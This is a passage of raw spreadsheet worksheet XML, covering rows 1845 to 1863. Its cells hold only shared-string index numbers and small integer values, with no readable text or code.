      </c>
      <c r="G1845" s="12" t="s">
        <v>13350</v>
      </c>
      <c r="H1845" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1845" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1845" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K1845" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1845" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1845" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1845" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1845" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1845" s="12" t="s">
        <v>13293</v>
      </c>
      <c r="Q1845" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1845" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1845" s="12" t="s">
        <v>13351</v>
      </c>
      <c r="T1845" s="12" t="s">
        <v>13352</v>
      </c>
      <c r="U1845" s="12" t="s">
        <v>13353</v>
      </c>
      <c r="V1845" s="12" t="s">
        <v>8941</v>
      </c>
      <c r="W1845" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1845" s="12">
        <v>2</v>
      </c>
      <c r="Y1845" s="12" t="s">
        <v>13354</v>
      </c>
    </row>
    <row r="1846" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1846" s="12">
        <v>9760</v>
      </c>
      <c r="B1846" s="12" t="s">
        <v>30674</v>
      </c>
      <c r="D1846" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F1846" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1846" s="12" t="s">
        <v>13355</v>
      </c>
      <c r="H1846" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1846" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1846" s="12" t="s">
        <v>194</v>
      </c>
      <c r="K1846" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1846" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1846" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1846" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1846" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1846" s="12" t="s">
        <v>13293</v>
      </c>
      <c r="Q1846" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1846" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1846" s="12" t="s">
        <v>13356</v>
      </c>
      <c r="T1846" s="12" t="s">
        <v>2966</v>
      </c>
      <c r="U1846" s="12" t="s">
        <v>13357</v>
      </c>
      <c r="V1846" s="12" t="s">
        <v>4704</v>
      </c>
      <c r="W1846" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1846" s="12">
        <v>7</v>
      </c>
      <c r="Y1846" s="12" t="s">
        <v>13358</v>
      </c>
    </row>
    <row r="1847" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1847" s="12">
        <v>9762</v>
      </c>
      <c r="B1847" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1847" s="12" t="s">
        <v>31189</v>
      </c>
      <c r="E1847" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F1847" s="12" t="s">
        <v>31194</v>
      </c>
      <c r="G1847" s="12" t="s">
        <v>13364</v>
      </c>
      <c r="H1847" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1847" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1847" s="12" t="s">
        <v>103</v>
      </c>
      <c r="K1847" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1847" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1847" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1847" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1847" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1847" s="12" t="s">
        <v>13365</v>
      </c>
      <c r="Q1847" s="12" t="s">
        <v>28306</v>
      </c>
      <c r="R1847" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1847" s="12" t="s">
        <v>13366</v>
      </c>
      <c r="T1847" s="12" t="s">
        <v>13367</v>
      </c>
      <c r="U1847" s="12" t="s">
        <v>13368</v>
      </c>
      <c r="V1847" s="12" t="s">
        <v>179</v>
      </c>
      <c r="W1847" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1847" s="12">
        <v>7</v>
      </c>
      <c r="Y1847" s="12" t="s">
        <v>13369</v>
      </c>
    </row>
    <row r="1848" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1848" s="12">
        <v>9766</v>
      </c>
      <c r="B1848" s="12" t="s">
        <v>31200</v>
      </c>
      <c r="C1848" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D1848" s="12" t="s">
        <v>31504</v>
      </c>
      <c r="F1848" s="12" t="s">
        <v>31201</v>
      </c>
      <c r="G1848" s="12" t="s">
        <v>13370</v>
      </c>
      <c r="H1848" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1848" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J1848" s="12" t="s">
        <v>12555</v>
      </c>
      <c r="K1848" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1848" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1848" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1848" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1848" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1848" s="12" t="s">
        <v>13371</v>
      </c>
      <c r="Q1848" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1848" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1848" s="12" t="s">
        <v>13372</v>
      </c>
      <c r="T1848" s="12" t="s">
        <v>10100</v>
      </c>
      <c r="U1848" s="12" t="s">
        <v>13373</v>
      </c>
      <c r="V1848" s="12" t="s">
        <v>13296</v>
      </c>
      <c r="W1848" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1848" s="12">
        <v>3</v>
      </c>
      <c r="Y1848" s="12" t="s">
        <v>13374</v>
      </c>
    </row>
    <row r="1849" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1849" s="12">
        <v>9772</v>
      </c>
      <c r="B1849" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C1849" s="12" t="s">
        <v>29857</v>
      </c>
      <c r="D1849" s="12" t="s">
        <v>29856</v>
      </c>
      <c r="E1849" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1849" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1849" s="12" t="s">
        <v>13375</v>
      </c>
      <c r="H1849" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1849" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J1849" s="12" t="s">
        <v>2586</v>
      </c>
      <c r="K1849" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1849" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1849" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1849" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1849" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1849" s="12" t="s">
        <v>13376</v>
      </c>
      <c r="Q1849" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1849" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1849" s="12" t="s">
        <v>13377</v>
      </c>
      <c r="T1849" s="12" t="s">
        <v>13378</v>
      </c>
      <c r="U1849" s="12" t="s">
        <v>13379</v>
      </c>
      <c r="V1849" s="12" t="s">
        <v>6839</v>
      </c>
      <c r="W1849" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1849" s="12">
        <v>39</v>
      </c>
      <c r="Y1849" s="12" t="s">
        <v>13380</v>
      </c>
    </row>
    <row r="1850" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1850" s="12">
        <v>9775</v>
      </c>
      <c r="B1850" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D1850" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F1850" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="G1850" s="12" t="s">
        <v>13387</v>
      </c>
      <c r="H1850" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1850" s="12" t="s">
        <v>525</v>
      </c>
      <c r="J1850" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K1850" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1850" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1850" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1850" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1850" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1850" s="12" t="s">
        <v>13388</v>
      </c>
      <c r="Q1850" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1850" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1850" s="12" t="s">
        <v>13389</v>
      </c>
      <c r="T1850" s="12" t="s">
        <v>13390</v>
      </c>
      <c r="U1850" s="12" t="s">
        <v>13391</v>
      </c>
      <c r="V1850" s="12" t="s">
        <v>8781</v>
      </c>
      <c r="W1850" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1850" s="12">
        <v>11</v>
      </c>
      <c r="Y1850" s="12" t="s">
        <v>13392</v>
      </c>
    </row>
    <row r="1851" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1851" s="12">
        <v>9778</v>
      </c>
      <c r="B1851" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D1851" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E1851" s="12" t="s">
        <v>31429</v>
      </c>
      <c r="F1851" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="G1851" s="12" t="s">
        <v>13393</v>
      </c>
      <c r="H1851" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1851" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J1851" s="12" t="s">
        <v>139</v>
      </c>
      <c r="K1851" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1851" s="12" t="s">
        <v>4026</v>
      </c>
      <c r="M1851" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N1851" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O1851" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1851" s="12" t="s">
        <v>13371</v>
      </c>
      <c r="Q1851" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1851" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1851" s="12" t="s">
        <v>13394</v>
      </c>
      <c r="T1851" s="12" t="s">
        <v>13395</v>
      </c>
      <c r="U1851" s="12" t="s">
        <v>13396</v>
      </c>
      <c r="V1851" s="12" t="s">
        <v>995</v>
      </c>
      <c r="W1851" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1851" s="12">
        <v>7</v>
      </c>
      <c r="Y1851" s="12" t="s">
        <v>13397</v>
      </c>
    </row>
    <row r="1852" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1852" s="12">
        <v>9779</v>
      </c>
      <c r="B1852" s="12" t="s">
        <v>29882</v>
      </c>
      <c r="D1852" s="12" t="s">
        <v>29883</v>
      </c>
      <c r="E1852" s="12" t="s">
        <v>31564</v>
      </c>
      <c r="F1852" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1852" s="12" t="s">
        <v>13398</v>
      </c>
      <c r="H1852" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1852" s="12" t="s">
        <v>925</v>
      </c>
      <c r="J1852" s="12" t="s">
        <v>926</v>
      </c>
      <c r="K1852" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1852" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M1852" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N1852" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O1852" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1852" s="12" t="s">
        <v>10414</v>
      </c>
      <c r="Q1852" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1852" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1852" s="12" t="s">
        <v>13399</v>
      </c>
      <c r="T1852" s="12" t="s">
        <v>13400</v>
      </c>
      <c r="U1852" s="12" t="s">
        <v>13401</v>
      </c>
      <c r="V1852" s="12" t="s">
        <v>5069</v>
      </c>
      <c r="W1852" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1852" s="12">
        <v>9</v>
      </c>
      <c r="Y1852" s="12" t="s">
        <v>13402</v>
      </c>
    </row>
    <row r="1853" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1853" s="12">
        <v>9786</v>
      </c>
      <c r="B1853" s="12" t="s">
        <v>30520</v>
      </c>
      <c r="C1853" s="12" t="s">
        <v>30521</v>
      </c>
      <c r="D1853" s="12" t="s">
        <v>30522</v>
      </c>
      <c r="E1853" s="12" t="s">
        <v>31435</v>
      </c>
      <c r="F1853" s="12" t="s">
        <v>30505</v>
      </c>
      <c r="G1853" s="12" t="s">
        <v>13403</v>
      </c>
      <c r="H1853" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1853" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J1853" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K1853" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1853" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1853" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1853" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1853" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1853" s="12" t="s">
        <v>13371</v>
      </c>
      <c r="Q1853" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1853" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1853" s="12" t="s">
        <v>13404</v>
      </c>
      <c r="T1853" s="12" t="s">
        <v>12563</v>
      </c>
      <c r="U1853" s="12" t="s">
        <v>13314</v>
      </c>
      <c r="V1853" s="12" t="s">
        <v>3527</v>
      </c>
      <c r="W1853" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1853" s="12">
        <v>5</v>
      </c>
      <c r="Y1853" s="12" t="s">
        <v>13405</v>
      </c>
    </row>
    <row r="1854" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1854" s="12">
        <v>9790</v>
      </c>
      <c r="B1854" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1854" s="12" t="s">
        <v>31202</v>
      </c>
      <c r="F1854" s="12" t="s">
        <v>31194</v>
      </c>
      <c r="G1854" s="12" t="s">
        <v>13406</v>
      </c>
      <c r="H1854" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1854" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1854" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K1854" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1854" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1854" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1854" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1854" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1854" s="12" t="s">
        <v>13407</v>
      </c>
      <c r="Q1854" s="12" t="s">
        <v>28306</v>
      </c>
      <c r="R1854" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1854" s="12" t="s">
        <v>13408</v>
      </c>
      <c r="T1854" s="12" t="s">
        <v>13409</v>
      </c>
      <c r="U1854" s="12" t="s">
        <v>13410</v>
      </c>
      <c r="V1854" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W1854" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1854" s="12">
        <v>14</v>
      </c>
      <c r="Y1854" s="12" t="s">
        <v>13411</v>
      </c>
    </row>
    <row r="1855" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1855" s="12">
        <v>9793</v>
      </c>
      <c r="B1855" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C1855" s="12" t="s">
        <v>29971</v>
      </c>
      <c r="D1855" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1855" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F1855" s="12" t="s">
        <v>29962</v>
      </c>
      <c r="G1855" s="12" t="s">
        <v>13413</v>
      </c>
      <c r="H1855" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1855" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1855" s="12" t="s">
        <v>2451</v>
      </c>
      <c r="K1855" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1855" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1855" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1855" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1855" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1855" s="12" t="s">
        <v>13414</v>
      </c>
      <c r="Q1855" s="12" t="s">
        <v>28304</v>
      </c>
      <c r="R1855" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1855" s="12" t="s">
        <v>13415</v>
      </c>
      <c r="T1855" s="12" t="s">
        <v>5742</v>
      </c>
      <c r="U1855" s="12" t="s">
        <v>13416</v>
      </c>
      <c r="V1855" s="12" t="s">
        <v>13417</v>
      </c>
      <c r="W1855" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1855" s="12">
        <v>12</v>
      </c>
      <c r="Y1855" s="12" t="s">
        <v>13418</v>
      </c>
    </row>
    <row r="1856" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1856" s="12">
        <v>9806</v>
      </c>
      <c r="B1856" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D1856" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E1856" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F1856" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="G1856" s="12" t="s">
        <v>13419</v>
      </c>
      <c r="H1856" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1856" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1856" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K1856" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1856" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1856" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1856" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1856" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1856" s="12" t="s">
        <v>6633</v>
      </c>
      <c r="Q1856" s="12" t="s">
        <v>28306</v>
      </c>
      <c r="R1856" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1856" s="12" t="s">
        <v>13420</v>
      </c>
      <c r="T1856" s="12" t="s">
        <v>13421</v>
      </c>
      <c r="U1856" s="12" t="s">
        <v>13422</v>
      </c>
      <c r="V1856" s="12" t="s">
        <v>70</v>
      </c>
      <c r="W1856" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1856" s="12">
        <v>3</v>
      </c>
      <c r="Y1856" s="12" t="s">
        <v>13423</v>
      </c>
    </row>
    <row r="1857" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1857" s="12">
        <v>9811</v>
      </c>
      <c r="B1857" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D1857" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E1857" s="12" t="s">
        <v>31429</v>
      </c>
      <c r="F1857" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="G1857" s="12" t="s">
        <v>13424</v>
      </c>
      <c r="H1857" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1857" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J1857" s="12" t="s">
        <v>139</v>
      </c>
      <c r="K1857" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1857" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1857" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1857" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1857" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1857" s="12" t="s">
        <v>13371</v>
      </c>
      <c r="Q1857" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1857" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1857" s="12" t="s">
        <v>13425</v>
      </c>
      <c r="T1857" s="12" t="s">
        <v>13426</v>
      </c>
      <c r="U1857" s="12" t="s">
        <v>13427</v>
      </c>
      <c r="V1857" s="12" t="s">
        <v>995</v>
      </c>
      <c r="W1857" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1857" s="12">
        <v>4</v>
      </c>
      <c r="Y1857" s="12" t="s">
        <v>13428</v>
      </c>
    </row>
    <row r="1858" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1858" s="12">
        <v>9822</v>
      </c>
      <c r="B1858" s="12" t="s">
        <v>31191</v>
      </c>
      <c r="D1858" s="12" t="s">
        <v>31189</v>
      </c>
      <c r="E1858" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F1858" s="12" t="s">
        <v>31203</v>
      </c>
      <c r="G1858" s="12" t="s">
        <v>13430</v>
      </c>
      <c r="H1858" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1858" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1858" s="12" t="s">
        <v>103</v>
      </c>
      <c r="K1858" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1858" s="12" t="s">
        <v>11596</v>
      </c>
      <c r="M1858" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N1858" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O1858" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1858" s="12" t="s">
        <v>13431</v>
      </c>
      <c r="Q1858" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1858" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1858" s="12" t="s">
        <v>13432</v>
      </c>
      <c r="T1858" s="12" t="s">
        <v>10471</v>
      </c>
      <c r="U1858" s="12" t="s">
        <v>13433</v>
      </c>
      <c r="V1858" s="12" t="s">
        <v>10471</v>
      </c>
      <c r="W1858" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1858" s="12">
        <v>10</v>
      </c>
      <c r="Y1858" s="12" t="s">
        <v>13434</v>
      </c>
    </row>
    <row r="1859" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1859" s="12">
        <v>9824</v>
      </c>
      <c r="B1859" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D1859" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E1859" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F1859" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="G1859" s="12" t="s">
        <v>13435</v>
      </c>
      <c r="H1859" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1859" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1859" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K1859" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1859" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M1859" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N1859" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O1859" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1859" s="12" t="s">
        <v>13436</v>
      </c>
      <c r="Q1859" s="12" t="s">
        <v>28306</v>
      </c>
      <c r="R1859" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1859" s="12" t="s">
        <v>13437</v>
      </c>
      <c r="T1859" s="12" t="s">
        <v>13438</v>
      </c>
      <c r="U1859" s="12" t="s">
        <v>13439</v>
      </c>
      <c r="V1859" s="12" t="s">
        <v>13440</v>
      </c>
      <c r="W1859" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1859" s="12">
        <v>13</v>
      </c>
      <c r="Y1859" s="12" t="s">
        <v>13441</v>
      </c>
    </row>
    <row r="1860" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1860" s="12">
        <v>9828</v>
      </c>
      <c r="B1860" s="12" t="s">
        <v>28356</v>
      </c>
      <c r="C1860" s="12" t="s">
        <v>28361</v>
      </c>
      <c r="D1860" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E1860" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F1860" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="G1860" s="12" t="s">
        <v>13442</v>
      </c>
      <c r="H1860" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1860" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1860" s="12" t="s">
        <v>194</v>
      </c>
      <c r="K1860" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1860" s="12" t="s">
        <v>11596</v>
      </c>
      <c r="M1860" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N1860" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O1860" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1860" s="12" t="s">
        <v>13443</v>
      </c>
      <c r="Q1860" s="12" t="s">
        <v>28283</v>
      </c>
      <c r="R1860" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1860" s="12" t="s">
        <v>13444</v>
      </c>
      <c r="T1860" s="12" t="s">
        <v>4704</v>
      </c>
      <c r="U1860" s="12" t="s">
        <v>13445</v>
      </c>
      <c r="V1860" s="12" t="s">
        <v>4704</v>
      </c>
      <c r="W1860" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1860" s="12">
        <v>4</v>
      </c>
      <c r="Y1860" s="12" t="s">
        <v>13446</v>
      </c>
    </row>
    <row r="1861" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1861" s="12">
        <v>9829</v>
      </c>
      <c r="B1861" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1861" s="12" t="s">
        <v>30522</v>
      </c>
      <c r="E1861" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F1861" s="12" t="s">
        <v>30505</v>
      </c>
      <c r="G1861" s="12" t="s">
        <v>13447</v>
      </c>
      <c r="H1861" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1861" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1861" s="12" t="s">
        <v>515</v>
      </c>
      <c r="K1861" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1861" s="12" t="s">
        <v>4026</v>
      </c>
      <c r="M1861" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N1861" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O1861" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1861" s="12" t="s">
        <v>10414</v>
      </c>
      <c r="Q1861" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1861" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1861" s="12" t="s">
        <v>13448</v>
      </c>
      <c r="T1861" s="12" t="s">
        <v>13449</v>
      </c>
      <c r="U1861" s="12" t="s">
        <v>13450</v>
      </c>
      <c r="V1861" s="12" t="s">
        <v>523</v>
      </c>
      <c r="W1861" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1861" s="12">
        <v>3</v>
      </c>
      <c r="Y1861" s="12" t="s">
        <v>13451</v>
      </c>
    </row>
    <row r="1862" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1862" s="12">
        <v>9842</v>
      </c>
      <c r="B1862" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1862" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1862" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F1862" s="12" t="s">
        <v>30152</v>
      </c>
      <c r="G1862" s="12" t="s">
        <v>13462</v>
      </c>
      <c r="H1862" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1862" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1862" s="12" t="s">
        <v>96</v>
      </c>
      <c r="K1862" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1862" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1862" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1862" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1862" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1862" s="12" t="s">
        <v>13463</v>
      </c>
      <c r="Q1862" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1862" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1862" s="12" t="s">
        <v>13464</v>
      </c>
      <c r="T1862" s="12" t="s">
        <v>8000</v>
      </c>
      <c r="U1862" s="12" t="s">
        <v>13465</v>
      </c>
      <c r="V1862" s="12" t="s">
        <v>5053</v>
      </c>
      <c r="W1862" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1862" s="12">
        <v>16</v>
      </c>
      <c r="Y1862" s="12" t="s">
        <v>13466</v>
      </c>
    </row>
    <row r="1863" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1863" s="12">
        <v>9845</v>
      </c>
      <c r="B1863" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D1863" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F1863" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="G1863" s="12" t="s">
        <v>13472</v>
      </c>
      <c r="H1863" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1863" s="12" t="s">
        <v>22</v>
      </c>
